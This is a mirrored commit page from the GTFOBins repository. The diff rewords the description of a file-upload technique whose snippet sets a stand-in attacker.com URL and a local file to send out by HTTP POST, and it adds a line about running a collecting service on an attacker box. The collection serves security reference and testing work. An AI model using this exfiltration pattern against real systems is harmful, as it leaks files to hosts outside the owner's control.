mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-07-25 19:54:14 +02:00
Fix description
This commit is contained in:
@@ -1,7 +1,7 @@
|
||||
---
|
||||
functions:
|
||||
upload:
|
||||
- description: Send local file with an HTTP POST request.
|
||||
- description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
|
||||
code: |
|
||||
URL=http://attacker.com/
|
||||
LFILE=file_to_send
|
||||
|
Reference in New Issue
Block a user